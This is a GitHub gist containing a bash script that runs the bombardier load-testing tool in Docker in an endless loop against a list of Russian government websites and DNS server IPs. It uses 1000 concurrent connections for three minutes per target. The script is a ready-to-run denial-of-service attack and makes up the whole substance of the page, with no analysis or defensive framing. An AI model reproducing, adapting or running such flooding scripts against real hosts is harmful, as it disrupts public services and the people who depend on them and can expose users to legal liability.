Skip to content

Instantly share code, notes, and snippets.

@driversti
Created March 1, 2022 11:34
Show Gist options
  • Save driversti/bfdab5248b35346ef6ca9a22da36202e to your computer and use it in GitHub Desktop.
Save driversti/bfdab5248b35346ef6ca9a22da36202e to your computer and use it in GitHub Desktop.
#!/bin/bash -x
DESTS=( "http://duma.gov.ru/" "http://president-sovet.ru/" "https://sovetnational.ru/" "https://www.gosuslugi.ru/ru/" "https://zakupki.gov.ru/epz/main/public/home.html" "https://gossluzhba.gov.ru/" "http://defence.council.gov.ru/" "http://budget.council.gov.ru/" "http://www.kremlin.ru/" "https://government.ru/" "http://www.scrf.gov.ru/" "http://www.ksrf.ru/ru/Pages/default.aspx" "http://www.vsrf.ru/" "http://premier.gov.ru/events/" "https://www.mchs.gov.ru/" "https://minjust.gov.ru/ru/" "http://www.fsb.ru/" "https://rosguard.gov.ru/" "https://customs.gov.ru/" "https://udprf.ru/" "http://favt.gov.ru/" "http://194.67.2.109:53/UDP" "http://194.67.7.1:53/UDP" "http://194.54.14.187:53/UDP" "http://194.54.14.186:53/UDP" )
TIME="180s"
while TRUE
do
for DEST in ${DESTS[@]}
do
docker run -ti --rm alpine/bombardier -c 1000 -d $TIME -l $DEST
done
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment